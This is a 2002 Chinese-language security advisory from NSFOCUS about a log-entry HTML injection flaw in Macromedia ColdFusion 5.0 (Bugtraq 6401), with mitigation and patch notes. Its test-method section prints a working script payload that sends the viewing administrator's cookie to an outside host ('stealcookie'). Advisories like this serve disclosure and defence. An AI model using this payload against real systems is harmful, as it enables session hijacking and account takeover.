首页 -> 安全研究

安全研究

安全漏洞
Macromedia ColdFusion日志条目HTML注入漏洞

发布日期:2002-12-16
更新日期:2002-12-24

受影响系统:
Allaire ColdFusion Server 5.0
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - RedHat Linux 7.0
    - Sun Solaris 8.0
    - SuSE Linux 7.0
描述:
BUGTRAQ  ID: 6401

Macromedia ColdFusion是一款高效的网络应用服务器开发环境,具有很高的易用性和开发效率,基于标准的Java技术。可以与XML、Web Services和Microsoft .NET环境相集成。

ColdFusion没有充分的过滤日志条目中的恶意HTML代码,远程攻击者可以利用这个漏洞提交恶意数据触发异常,生成包含HTML代码的日志文件,当管理员查看时导致脚本执行。

当Coldfusion管理员允许用户通过用户的WEB浏览器查看日志时,会使用如下代码进行处理:

<CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
   SELECT * FROM Products
   Where ProductId = #int(url.productid)#
</CFQUERY>

如果int函数获得值不是数字,它就会发生异常并写错误值application.log,如果攻击者提交的url.productid值包含恶意HTML或JavaScript代码,当管理员不小心查看日志的时候,就可以导致脚本代码在管理员浏览器上执行,导致基于Cookie认证的信息泄露或者进行更多恶意操作。

<*来源:KiLL CoLe (killcole@yahoo.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104006589823109&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

KiLL CoLe (killcole@yahoo.com)提供了如下测试方法:

提供url.productid值为:

<iframe name="frame1" width="0" height="0"></iframe>
<script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie="
+ document.cookie</script>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 使用文本浏览器查看日志。

厂商补丁:

Allaire
-------
macromedia已经补丁,但根据报告没有公开可下载,请联系供应商获得相关补丁。

http://www.macromedia.com/

浏览次数:3209
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障